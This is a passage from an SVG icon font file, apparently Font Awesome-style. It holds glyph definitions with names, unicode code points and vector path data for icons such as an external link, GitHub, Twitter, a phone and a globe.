t-38 90t38 90t90 38h640q52 0 90 -38t38 -90t-38 -90t-90 -38v-512q99 0 177.5 -98.5t78.5 -221.5z" />
    <glyph glyph-name="external_link" unicode="&#xf08e;" horiz-adv-x="1792" 
d="M1408 608v-320q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h704q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-704q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113v320
q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM1792 1472v-512q0 -26 -19 -45t-45 -19t-45 19l-176 176l-652 -652q-10 -10 -23 -10t-23 10l-114 114q-10 10 -10 23t10 23l652 652l-176 176q-19 19 -19 45t19 45t45 19h512q26 0 45 -19t19 -45z" />
    <glyph glyph-name="signin" unicode="&#xf090;" 
d="M1184 640q0 -26 -19 -45l-544 -544q-19 -19 -45 -19t-45 19t-19 45v288h-448q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h448v288q0 26 19 45t45 19t45 -19l544 -544q19 -19 19 -45zM1536 992v-704q0 -119 -84.5 -203.5t-203.5 -84.5h-320q-13 0 -22.5 9.5t-9.5 22.5
q0 4 -1 20t-0.5 26.5t3 23.5t10 19.5t20.5 6.5h320q66 0 113 47t47 113v704q0 66 -47 113t-113 47h-288h-11h-13t-11.5 1t-11.5 3t-8 5.5t-7 9t-2 13.5q0 4 -1 20t-0.5 26.5t3 23.5t10 19.5t20.5 6.5h320q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="trophy" unicode="&#xf091;" horiz-adv-x="1664" 
d="M458 653q-74 162 -74 371h-256v-96q0 -78 94.5 -162t235.5 -113zM1536 928v96h-256q0 -209 -74 -371q141 29 235.5 113t94.5 162zM1664 1056v-128q0 -71 -41.5 -143t-112 -130t-173 -97.5t-215.5 -44.5q-42 -54 -95 -95q-38 -34 -52.5 -72.5t-14.5 -89.5q0 -54 30.5 -91
t97.5 -37q75 0 133.5 -45.5t58.5 -114.5v-64q0 -14 -9 -23t-23 -9h-832q-14 0 -23 9t-9 23v64q0 69 58.5 114.5t133.5 45.5q67 0 97.5 37t30.5 91q0 51 -14.5 89.5t-52.5 72.5q-53 41 -95 95q-113 5 -215.5 44.5t-173 97.5t-112 130t-41.5 143v128q0 40 28 68t68 28h288v96
q0 66 47 113t113 47h576q66 0 113 -47t47 -113v-96h288q40 0 68 -28t28 -68z" />
    <glyph glyph-name="github_sign" unicode="&#xf092;" 
d="M519 336q4 6 -3 13q-9 7 -14 2q-4 -6 3 -13q9 -7 14 -2zM491 377q-5 7 -12 4q-6 -4 0 -12q7 -8 12 -5q6 4 0 13zM450 417q2 4 -5 8q-7 2 -8 -2q-3 -5 4 -8q8 -2 9 2zM471 394q2 1 1.5 4.5t-3.5 5.5q-6 7 -10 3t1 -11q6 -6 11 -2zM557 319q2 7 -9 11q-9 3 -13 -4
q-2 -7 9 -11q9 -3 13 4zM599 316q0 8 -12 8q-10 0 -10 -8t11 -8t11 8zM638 323q-2 7 -13 5t-9 -9q2 -8 12 -6t10 10zM1280 640q0 212 -150 362t-362 150t-362 -150t-150 -362q0 -167 98 -300.5t252 -185.5q18 -3 26.5 5t8.5 20q0 52 -1 95q-6 -1 -15.5 -2.5t-35.5 -2t-48 4
t-43.5 20t-29.5 41.5q-23 59 -57 74q-2 1 -4.5 3.5l-8 8t-7 9.5t4 7.5t19.5 3.5q6 0 15 -2t30 -15.5t33 -35.5q16 -28 37.5 -42t43.5 -14t38 3.5t30 9.5q7 47 33 69q-49 6 -86 18.5t-73 39t-55.5 76t-19.5 119.5q0 79 53 137q-24 62 5 136q19 6 54.5 -7.5t60.5 -29.5l26 -16
q58 17 128 17t128 -17q11 7 28.5 18t55.5 26t57 9q29 -74 5 -136q53 -58 53 -137q0 -57 -14 -100.5t-35.5 -70t-53.5 -44.5t-62.5 -26t-68.5 -12q35 -31 35 -95q0 -40 -0.5 -89t-0.5 -51q0 -12 8.5 -20t26.5 -5q154 52 252 185.5t98 300.5zM1536 1120v-960
q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="upload_alt" unicode="&#xf093;" horiz-adv-x="1664" 
d="M1280 64q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1536 64q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1664 288v-320q0 -40 -28 -68t-68 -28h-1472q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h427q21 -56 70.5 -92
t110.5 -36h256q61 0 110.5 36t70.5 92h427q40 0 68 -28t28 -68zM1339 936q-17 -40 -59 -40h-256v-448q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v448h-256q-42 0 -59 40q-17 39 14 69l448 448q18 19 45 19t45 -19l448 -448q31 -30 14 -69z" />
    <glyph glyph-name="lemon" unicode="&#xf094;" 
d="M1407 710q0 44 -7 113.5t-18 96.5q-12 30 -17 44t-9 36.5t-4 48.5q0 23 5 68.5t5 67.5q0 37 -10 55q-4 1 -13 1q-19 0 -58 -4.5t-59 -4.5q-60 0 -176 24t-175 24q-43 0 -94.5 -11.5t-85 -23.5t-89.5 -34q-137 -54 -202 -103q-96 -73 -159.5 -189.5t-88 -236t-24.5 -248.5
q0 -40 12.5 -120t12.5 -121q0 -23 -11 -66.5t-11 -65.5t12 -36.5t34 -14.5q24 0 72.5 11t73.5 11q57 0 169.5 -15.5t169.5 -15.5q181 0 284 36q129 45 235.5 152.5t166 245.5t59.5 275zM1535 712q0 -165 -70 -327.5t-196 -288t-281 -180.5q-124 -44 -326 -44
q-57 0 -170 14.5t-169 14.5q-24 0 -72.5 -14.5t-73.5 -14.5q-73 0 -123.5 55.5t-50.5 128.5q0 24 11 68t11 67q0 40 -12.5 120.5t-12.5 121.5q0 111 18 217.5t54.5 209.5t100.5 194t150 156q78 59 232 120q194 78 316 78q60 0 175.5 -24t173.5 -24q19 0 57 5t58 5
q81 0 118 -50.5t37 -134.5q0 -23 -5 -68t-5 -68q0 -13 2 -25t3.5 -16.5t7.5 -20.5t8 -20q16 -40 25 -118.5t9 -136.5z" />
    <glyph glyph-name="phone" unicode="&#xf095;" horiz-adv-x="1408" 
d="M1408 296q0 -27 -10 -70.5t-21 -68.5q-21 -50 -122 -106q-94 -51 -186 -51q-27 0 -53 3.5t-57.5 12.5t-47 14.5t-55.5 20.5t-49 18q-98 35 -175 83q-127 79 -264 216t-216 264q-48 77 -83 175q-3 9 -18 49t-20.5 55.5t-14.5 47t-12.5 57.5t-3.5 53q0 92 51 186
q56 101 106 122q25 11 68.5 21t70.5 10q14 0 21 -3q18 -6 53 -76q11 -19 30 -54t35 -63.5t31 -53.5q3 -4 17.5 -25t21.5 -35.5t7 -28.5q0 -20 -28.5 -50t-62 -55t-62 -53t-28.5 -46q0 -9 5 -22.5t8.5 -20.5t14 -24t11.5 -19q76 -137 174 -235t235 -174q2 -1 19 -11.5t24 -14
t20.5 -8.5t22.5 -5q18 0 46 28.5t53 62t55 62t50 28.5q14 0 28.5 -7t35.5 -21.5t25 -17.5q25 -15 53.5 -31t63.5 -35t54 -30q70 -35 76 -53q3 -7 3 -21z" />
    <glyph glyph-name="check_empty" unicode="&#xf096;" horiz-adv-x="1408" 
d="M1120 1280h-832q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113v832q0 66 -47 113t-113 47zM1408 1120v-832q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832
q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="bookmark_empty" unicode="&#xf097;" horiz-adv-x="1280" 
d="M1152 1280h-1024v-1242l423 406l89 85l89 -85l423 -406v1242zM1164 1408q23 0 44 -9q33 -13 52.5 -41t19.5 -62v-1289q0 -34 -19.5 -62t-52.5 -41q-19 -8 -44 -8q-48 0 -83 32l-441 424l-441 -424q-36 -33 -83 -33q-23 0 -44 9q-33 13 -52.5 41t-19.5 62v1289
q0 34 19.5 62t52.5 41q21 9 44 9h1048z" />
    <glyph glyph-name="phone_sign" unicode="&#xf098;" 
d="M1280 343q0 11 -2 16t-18 16.5t-40.5 25t-47.5 26.5t-45.5 25t-28.5 15q-5 3 -19 13t-25 15t-21 5q-15 0 -36.5 -20.5t-39.5 -45t-38.5 -45t-33.5 -20.5q-7 0 -16.5 3.5t-15.5 6.5t-17 9.5t-14 8.5q-99 55 -170 126.5t-127 170.5q-2 3 -8.5 14t-9.5 17t-6.5 15.5
t-3.5 16.5q0 13 20.5 33.5t45 38.5t45 39.5t20.5 36.5q0 10 -5 21t-15 25t-13 19q-3 6 -15 28.5t-25 45.5t-26.5 47.5t-25 40.5t-16.5 18t-16 2q-48 0 -101 -22q-46 -21 -80 -94.5t-34 -130.5q0 -16 2.5 -34t5 -30.5t9 -33t10 -29.5t12.5 -33t11 -30q60 -164 216.5 -320.5
t320.5 -216.5q6 -2 30 -11t33 -12.5t29.5 -10t33 -9t30.5 -5t34 -2.5q57 0 130.5 34t94.5 80q22 53 22 101zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z
" />
    <glyph glyph-name="twitter" unicode="&#xf099;" horiz-adv-x="1664" 
d="M1620 1128q-67 -98 -162 -167q1 -14 1 -42q0 -130 -38 -259.5t-115.5 -248.5t-184.5 -210.5t-258 -146t-323 -54.5q-271 0 -496 145q35 -4 78 -4q225 0 401 138q-105 2 -188 64.5t-114 159.5q33 -5 61 -5q43 0 85 11q-112 23 -185.5 111.5t-73.5 205.5v4q68 -38 146 -41
q-66 44 -105 115t-39 154q0 88 44 163q121 -149 294.5 -238.5t371.5 -99.5q-8 38 -8 74q0 134 94.5 228.5t228.5 94.5q140 0 236 -102q109 21 205 78q-37 -115 -142 -178q93 10 186 50z" />
    <glyph glyph-name="facebook" unicode="&#xf09a;" horiz-adv-x="1024" 
d="M959 1524v-264h-157q-86 0 -116 -36t-30 -108v-189h293l-39 -296h-254v-759h-306v759h-255v296h255v218q0 186 104 288.5t277 102.5q147 0 228 -12z" />
    <glyph glyph-name="github" unicode="&#xf09b;" 
d="M768 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5q0 -251 -146.5 -451.5t-378.5 -277.5q-27 -5 -40 7t-13 30q0 3 0.5 76.5t0.5 134.5q0 97 -52 142q57 6 102.5 18t94 39t81 66.5t53 105t20.5 150.5q0 119 -79 206q37 91 -8 204q-28 9 -81 -11t-92 -44l-38 -24
q-93 26 -192 26t-192 -26q-16 11 -42.5 27t-83.5 38.5t-85 13.5q-45 -113 -8 -204q-79 -87 -79 -206q0 -85 20.5 -150t52.5 -105t80.5 -67t94 -39t102.5 -18q-39 -36 -49 -103q-21 -10 -45 -15t-57 -5t-65.5 21.5t-55.5 62.5q-19 32 -48.5 52t-49.5 24l-20 3q-21 0 -29 -4.5
t-5 -11.5t9 -14t13 -12l7 -5q22 -10 43.5 -38t31.5 -51l10 -23q13 -38 44 -61.5t67 -30t69.5 -7t55.5 3.5l23 4q0 -38 0.5 -88.5t0.5 -54.5q0 -18 -13 -30t-40 -7q-232 77 -378.5 277.5t-146.5 451.5q0 209 103 385.5t279.5 279.5t385.5 103zM291 305q3 7 -7 12
q-10 3 -13 -2q-3 -7 7 -12q9 -6 13 2zM322 271q7 5 -2 16q-10 9 -16 3q-7 -5 2 -16q10 -10 16 -3zM352 226q9 7 0 19q-8 13 -17 6q-9 -5 0 -18t17 -7zM394 184q8 8 -4 19q-12 12 -20 3q-9 -8 4 -19q12 -12 20 -3zM451 159q3 11 -13 16q-15 4 -19 -7t13 -15q15 -6 19 6z
M514 154q0 13 -17 11q-16 0 -16 -11q0 -13 17 -11q16 0 16 11zM572 164q-2 11 -18 9q-16 -3 -14 -15t18 -8t14 14z" />
    <glyph glyph-name="unlock" unicode="&#xf09c;" horiz-adv-x="1664" 
d="M1664 960v-256q0 -26 -19 -45t-45 -19h-64q-26 0 -45 19t-19 45v256q0 106 -75 181t-181 75t-181 -75t-75 -181v-192h96q40 0 68 -28t28 -68v-576q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v576q0 40 28 68t68 28h672v192q0 185 131.5 316.5t316.5 131.5
t316.5 -131.5t131.5 -316.5z" />
    <glyph glyph-name="credit_card" unicode="&#xf09d;" horiz-adv-x="1920" 
d="M1760 1408q66 0 113 -47t47 -113v-1216q0 -66 -47 -113t-113 -47h-1600q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1600zM160 1280q-13 0 -22.5 -9.5t-9.5 -22.5v-224h1664v224q0 13 -9.5 22.5t-22.5 9.5h-1600zM1760 0q13 0 22.5 9.5t9.5 22.5v608h-1664v-608
q0 -13 9.5 -22.5t22.5 -9.5h1600zM256 128v128h256v-128h-256zM640 128v128h384v-128h-384z" />
    <glyph glyph-name="rss" unicode="&#xf09e;" horiz-adv-x="1408" 
d="M384 192q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM896 69q2 -28 -17 -48q-18 -21 -47 -21h-135q-25 0 -43 16.5t-20 41.5q-22 229 -184.5 391.5t-391.5 184.5q-25 2 -41.5 20t-16.5 43v135q0 29 21 47q17 17 43 17h5q160 -13 306 -80.5
t259 -181.5q114 -113 181.5 -259t80.5 -306zM1408 67q2 -27 -18 -47q-18 -20 -46 -20h-143q-26 0 -44.5 17.5t-19.5 42.5q-12 215 -101 408.5t-231.5 336t-336 231.5t-408.5 102q-25 1 -42.5 19.5t-17.5 43.5v143q0 28 20 46q18 18 44 18h3q262 -13 501.5 -120t425.5 -294
q187 -186 294 -425.5t120 -501.5z" />
    <glyph glyph-name="hdd" unicode="&#xf0a0;" 
d="M1040 320q0 -33 -23.5 -56.5t-56.5 -23.5t-56.5 23.5t-23.5 56.5t23.5 56.5t56.5 23.5t56.5 -23.5t23.5 -56.5zM1296 320q0 -33 -23.5 -56.5t-56.5 -23.5t-56.5 23.5t-23.5 56.5t23.5 56.5t56.5 23.5t56.5 -23.5t23.5 -56.5zM1408 160v320q0 13 -9.5 22.5t-22.5 9.5
h-1216q-13 0 -22.5 -9.5t-9.5 -22.5v-320q0 -13 9.5 -22.5t22.5 -9.5h1216q13 0 22.5 9.5t9.5 22.5zM178 640h1180l-157 482q-4 13 -16 21.5t-26 8.5h-782q-14 0 -26 -8.5t-16 -21.5zM1536 480v-320q0 -66 -47 -113t-113 -47h-1216q-66 0 -113 47t-47 113v320q0 25 16 75
l197 606q17 53 63 86t101 33h782q55 0 101 -33t63 -86l197 -606q16 -50 16 -75z" />
    <glyph glyph-name="bullhorn" unicode="&#xf0a1;" horiz-adv-x="1792" 
d="M1664 896q53 0 90.5 -37.5t37.5 -90.5t-37.5 -90.5t-90.5 -37.5v-384q0 -52 -38 -90t-90 -38q-417 347 -812 380q-58 -19 -91 -66t-31 -100.5t40 -92.5q-20 -33 -23 -65.5t6 -58t33.5 -55t48 -50t61.5 -50.5q-29 -58 -111.5 -83t-168.5 -11.5t-132 55.5q-7 23 -29.5 87.5
t-32 94.5t-23 89t-15 101t3.5 98.5t22 110.5h-122q-66 0 -113 47t-47 113v192q0 66 47 113t113 47h480q435 0 896 384q52 0 90 -38t38 -90v-384zM1536 292v954q-394 -302 -768 -343v-270q377 -42 768 -341z" />
    <glyph glyph-name="bell" unicode="&#xf0a2;" horiz-adv-x="1792" 
d="M912 -160q0 16 -16 16q-59 0 -101.5 42.5t-42.5 101.5q0 16 -16 16t-16 -16q0 -73 51.5 -124.5t124.5 -51.5q16 0 16 16zM246 128h1300q-266 300 -266 832q0 51 -24 105t-69 103t-121.5 80.5t-169.5 31.5t-169.5 -31.5t-121.5 -80.5t-69 -103t-24 -105q0 -532 -266 -832z
M1728 128q0 -52 -38 -90t-90 -38h-448q0 -106 -75 -181t-181 -75t-181 75t-75 181h-448q-52 0 -90 38t-38 90q50 42 91 88t85 119.5t74.5 158.5t50 206t19.5 260q0 152 117 282.5t307 158.5q-8 19 -8 39q0 40 28 68t68 28t68 -28t28 -68q0 -20 -8 -39q190 -28 307 -158.5
t117 -282.5q0 -139 19.5 -260t50 -206t74.5 -158.5t85 -119.5t91 -88z" />
    <glyph glyph-name="certificate" unicode="&#xf0a3;" 
d="M1376 640l138 -135q30 -28 20 -70q-12 -41 -52 -51l-188 -48l53 -186q12 -41 -19 -70q-29 -31 -70 -19l-186 53l-48 -188q-10 -40 -51 -52q-12 -2 -19 -2q-31 0 -51 22l-135 138l-135 -138q-28 -30 -70 -20q-41 11 -51 52l-48 188l-186 -53q-41 -12 -70 19q-31 29 -19 70
l53 186l-188 48q-40 10 -52 51q-10 42 20 70l138 135l-138 135q-30 28 -20 70q12 41 52 51l188 48l-53 186q-12 41 19 70q29 31 70 19l186 -53l48 188q10 41 51 51q41 12 70 -19l135 -139l135 139q29 30 70 19q41 -10 51 -51l48 -188l186 53q41 12 70 -19q31 -29 19 -70
l-53 -186l188 -48q40 -10 52 -51q10 -42 -20 -70z" />
    <glyph glyph-name="hand_right" unicode="&#xf0a4;" horiz-adv-x="1792" 
d="M256 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1664 768q0 51 -39 89.5t-89 38.5h-576q0 20 15 48.5t33 55t33 68t15 84.5q0 67 -44.5 97.5t-115.5 30.5q-24 0 -90 -139q-24 -44 -37 -65q-40 -64 -112 -145q-71 -81 -101 -106
q-69 -57 -140 -57h-32v-640h32q72 0 167 -32t193.5 -64t179.5 -32q189 0 189 167q0 26 -5 56q30 16 47.5 52.5t17.5 73.5t-18 69q53 50 53 119q0 25 -10 55.5t-25 47.5h331q52 0 90 38t38 90zM1792 769q0 -105 -75.5 -181t-180.5 -76h-169q-4 -62 -37 -119q3 -21 3 -43
q0 -101 -60 -178q1 -139 -85 -219.5t-227 -80.5q-133 0 -322 69q-164 59 -223 59h-288q-53 0 -90.5 37.5t-37.5 90.5v640q0 53 37.5 90.5t90.5 37.5h288q10 0 21.5 4.5t23.5 14t22.5 18t24 22.5t20.5 21.5t19 21.5t14 17q65 74 100 129q13 21 33 62t37 72t40.5 63t55 49.5
t69.5 17.5q125 0 206.5 -67t81.5 -189q0 -68 -22 -128h374q104 0 180 -76t76 -179z" />
    <glyph glyph-name="hand_left" unicode="&#xf0a5;" horiz-adv-x="1792" 
d="M1376 128h32v640h-32q-35 0 -67.5 12t-62.5 37t-50 46t-49 54q-8 9 -12 14q-72 81 -112 145q-14 22 -38 68q-1 3 -10.5 22.5t-18.5 36t-20 35.5t-21.5 30.5t-18.5 11.5q-71 0 -115.5 -30.5t-44.5 -97.5q0 -43 15 -84.5t33 -68t33 -55t15 -48.5h-576q-50 0 -89 -38.5
t-39 -89.5q0 -52 38 -90t90 -38h331q-15 -17 -25 -47.5t-10 -55.5q0 -69 53 -119q-18 -32 -18 -69t17.5 -73.5t47.5 -52.5q-4 -24 -4 -56q0 -85 48.5 -126t135.5 -41q84 0 183 32t194 64t167 32zM1664 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45z
M1792 768v-640q0 -53 -37.5 -90.5t-90.5 -37.5h-288q-59 0 -223 -59q-190 -69 -317 -69q-142 0 -230 77.5t-87 217.5l1 5q-61 76 -61 178q0 22 3 43q-33 57 -37 119h-169q-105 0 -180.5 76t-75.5 181q0 103 76 179t180 76h374q-22 60 -22 128q0 122 81.5 189t206.5 67
q38 0 69.5 -17.5t55 -49.5t40.5 -63t37 -72t33 -62q35 -55 100 -129q2 -3 14 -17t19 -21.5t20.5 -21.5t24 -22.5t22.5 -18t23.5 -14t21.5 -4.5h288q53 0 90.5 -37.5t37.5 -90.5z" />
    <glyph glyph-name="hand_up" unicode="&#xf0a6;" 
d="M1280 -64q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 700q0 189 -167 189q-26 0 -56 -5q-16 30 -52.5 47.5t-73.5 17.5t-69 -18q-50 53 -119 53q-25 0 -55.5 -10t-47.5 -25v331q0 52 -38 90t-90 38q-51 0 -89.5 -39t-38.5 -89v-576
q-20 0 -48.5 15t-55 33t-68 33t-84.5 15q-67 0 -97.5 -44.5t-30.5 -115.5q0 -24 139 -90q44 -24 65 -37q64 -40 145 -112q81 -71 106 -101q57 -69 57 -140v-32h640v32q0 72 32 167t64 193.5t32 179.5zM1536 705q0 -133 -69 -322q-59 -164 -59 -223v-288q0 -53 -37.5 -90.5
t-90.5 -37.5h-640q-53 0 -90.5 37.5t-37.5 90.5v288q0 10 -4.5 21.5t-14 23.5t-18 22.5t-22.5 24t-21.5 20.5t-21.5 19t-17 14q-74 65 -129 100q-21 13 -62 33t-72 37t-63 40.5t-49.5 55t-17.5 69.5q0 125 67 206.5t189 81.5q68 0 128 -22v374q0 104 76 180t179 76
q105 0 181 -75.5t76 -180.5v-169q62 -4 119 -37q21 3 43 3q101 0 178 -60q139 1 219.5 -85t80.5 -227z" />
    <glyph glyph-name="hand_down" unicode="&#xf0a7;" 
d="M1408 576q0 84 -32 183t-64 194t-32 167v32h-640v-32q0 -35 -12 -67.5t-37 -62.5t-46 -50t-54 -49q-9 -8 -14 -12q-81 -72 -145 -112q-22 -14 -68 -38q-3 -1 -22.5 -10.5t-36 -18.5t-35.5 -20t-30.5 -21.5t-11.5 -18.5q0 -71 30.5 -115.5t97.5 -44.5q43 0 84.5 15t68 33
t55 33t48.5 15v-576q0 -50 38.5 -89t89.5 -39q52 0 90 38t38 90v331q46 -35 103 -35q69 0 119 53q32 -18 69 -18t73.5 17.5t52.5 47.5q24 -4 56 -4q85 0 126 48.5t41 135.5zM1280 1344q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1536 580
q0 -142 -77.5 -230t-217.5 -87l-5 1q-76 -61 -178 -61q-22 0 -43 3q-54 -30 -119 -37v-169q0 -105 -76 -180.5t-181 -75.5q-103 0 -179 76t-76 180v374q-54 -22 -128 -22q-121 0 -188.5 81.5t-67.5 206.5q0 38 17.5 69.5t49.5 55t63 40.5t72 37t62 33q55 35 129 100
q3 2 17 14t21.5 19t21.5 20.5t22.5 24t18 22.5t14 23.5t4.5 21.5v288q0 53 37.5 90.5t90.5 37.5h640q53 0 90.5 -37.5t37.5 -90.5v-288q0 -59 59 -223q69 -190 69 -317z" />
    <glyph glyph-name="circle_arrow_left" unicode="&#xf0a8;" 
d="M1280 576v128q0 26 -19 45t-45 19h-502l189 189q19 19 19 45t-19 45l-91 91q-18 18 -45 18t-45 -18l-362 -362l-91 -91q-18 -18 -18 -45t18 -45l91 -91l362 -362q18 -18 45 -18t45 18l91 91q18 18 18 45t-18 45l-189 189h502q26 0 45 19t19 45zM1536 640
q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="circle_arrow_right" unicode="&#xf0a9;" 
d="M1285 640q0 27 -18 45l-91 91l-362 362q-18 18 -45 18t-45 -18l-91 -91q-18 -18 -18 -45t18 -45l189 -189h-502q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h502l-189 -189q-19 -19 -19 -45t19 -45l91 -91q18 -18 45 -18t45 18l362 362l91 91q18 18 18 45zM1536 640
q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="circle_arrow_up" unicode="&#xf0aa;" 
d="M1284 641q0 27 -18 45l-362 362l-91 91q-18 18 -45 18t-45 -18l-91 -91l-362 -362q-18 -18 -18 -45t18 -45l91 -91q18 -18 45 -18t45 18l189 189v-502q0 -26 19 -45t45 -19h128q26 0 45 19t19 45v502l189 -189q19 -19 45 -19t45 19l91 91q18 18 18 45zM1536 640
q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="circle_arrow_down" unicode="&#xf0ab;" 
d="M1284 639q0 27 -18 45l-91 91q-18 18 -45 18t-45 -18l-189 -189v502q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-502l-189 189q-19 19 -45 19t-45 -19l-91 -91q-18 -18 -18 -45t18 -45l362 -362l91 -91q18 -18 45 -18t45 18l91 91l362 362q18 18 18 45zM1536 640
q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="globe" unicode="&#xf0ac;" 
d="M768 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5t-103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103zM1042 887q-2 -1 -9.5 -9.5t-13.5 -9.5q2 0 4.5 5t5 11t3.5 7q6 7 22 15q14 6 52 12q34 8 51 -11
q-2 2 9.5 13t14.5 12q3 2 15 4.5t15 7.5l2 22q-12 -1 -17.5 7t-6.5 21q0 -2 -6 -8q0 7 -4.5 8t-11.5 -1t-9 -1q-10 3 -15 7.5t-8 16.5t-4 15q-2 5 -9.5 11t-9.5 10q-1 2 -2.5 5.5t-3 6.5t-4 5.5t-5.5 2.5t-7 -5t-7.5 -10t-4.5 -5q-3 2 -6 1.5t-4.5 -1t-4.5 -3t-5 -3.5
q-3 -2 -8.5 -3t-8.5 -2q15 5 -1 11q-10 4 -16 3q9 4 7.5 12t-8.5 14h5q-1 4 -8.5 8.5t-17.5 8.5t-13 6q-8 5 -34 9.5t-33 0.5q-5 -6 -4.5 -10.5t4 -14t3.5 -12.5q1 -6 -5.5 -13t-6.5 -12q0 -7 14 -15.5t10 -21.5q-3 -8 -16 -16t-16 -12q-5 -8 -1.5 -18.5t10.5 -16.5
q2 -2 1.5 -4t-3.5 -4.5t-5.5 -4t-6.5 -3.5l-3 -2q-11 -5 -20.5 6t-13.5 26q-7 25 -16 30q-23 8 -29 -1q-5 13 -41 26q-25 9 -58 4q6 1 0 15q-7 15 -19 12q3 6 4 17.5t1 13.5q3 13 12 23q1 1 7 8.5t9.5 13.5t0.5 6q35 -4 50 11q5 5 11.5 17t10.5 17q9 6 14 5.5t14.5 -5.5
t14.5 -5q14 -1 15.5 11t-7.5 20q12 -1 3 17q-4 7 -8 9q-12 4 -27 -5q-8 -4 2 -8q-1 1 -9.5 -10.5t-16.5 -17.5t-16 5q-1 1 -5.5 13.5t-9.5 13.5q-8 0 -16 -15q3 8 -11 15t-24 8q19 12 -8 27q-7 4 -20.5 5t-19.5 -4q-5 -7 -5.5 -11.5t5 -8t10.5 -5.5t11.5 -4t8.5 -3
q14 -10 8 -14q-2 -1 -8.5 -3.5t-11.5 -4.5t-6 -4q-3 -4 0 -14t-2 -14q-5 5 -9 17.5t-7 16.5q7 -9 -25 -6l-10 1q-4 0 -16 -2t-20.5 -1t-13.5 8q-4 8 0 20q1 4 4 2q-4 3 -11 9.5t-10 8.5q-46 -15 -94 -41q6 -1 12 1q5 2 13 6.5t10 5.5q34 14 42 7l5 5q14 -16 20 -25
q-7 4 -30 1q-20 -6 -22 -12q7 -12 5 -18q-4 3 -11.5 10t-14.5 11t-15 5q-16 0 -22 -1q-146 -80 -235 -222q7 -7 12 -8q4 -1 5 -9t2.5 -11t11.5 3q9 -8 3 -19q1 1 44 -27q19 -17 21 -21q3 -11 -10 -18q-1 2 -9 9t-9 4q-3 -5 0.5 -18.5t10.5 -12.5q-7 0 -9.5 -16t-2.5 -35.5
t-1 -23.5l2 -1q-3 -12 5.5 -34.5t21.5 -19.5q-13 -3 20 -43q6 -8 8 -9q3 -2 12 -7.5t15 -10t10 -10.5q4 -5 10 -22.5t14 -23.5q-2 -6 9.5 -20t10.5 -23q-1 0 -2.5 -1t-2.5 -1q3 -7 15.5 -14t15.5 -13q1 -3 2 -10t3 -11t8 -2q2 20 -24 62q-15 25 -17 29q-3 5 -5.5 15.5
t-4.5 14.5q2 0 6 -1.5t8.5 -3.5t7.5 -4t2 -3q-3 -7 2 -17.5t12 -18.5t17 -19t12 -13q6 -6 14 -19.5t0 -13.5q9 0 20 -10.5t17 -19.5q5 -8 8 -26t5 -24q2 -7 8.5 -13.5t12.5 -9.5l16 -8t13 -7q5 -2 18.5 -10.5t21.5 -11.5q10 -4 16 -4t14.5 2.5t13.5 3.5q15 2 29 -15t21 -21
q36 -19 55 -11q-2 -1 0.5 -7.5t8 -15.5t9 -14.5t5.5 -8.5q5 -6 18 -15t18 -15q6 4 7 9q-3 -8 7 -20t18 -10q14 3 14 32q-31 -15 -49 18q0 1 -2.5 5.5t-4 8.5t-2.5 8.5t0 7.5t5 3q9 0 10 3.5t-2 12.5t-4 13q-1 8 -11 20t-12 15q-5 -9 -16 -8t-16 9q0 -1 -1.5 -5.5t-1.5 -6.5
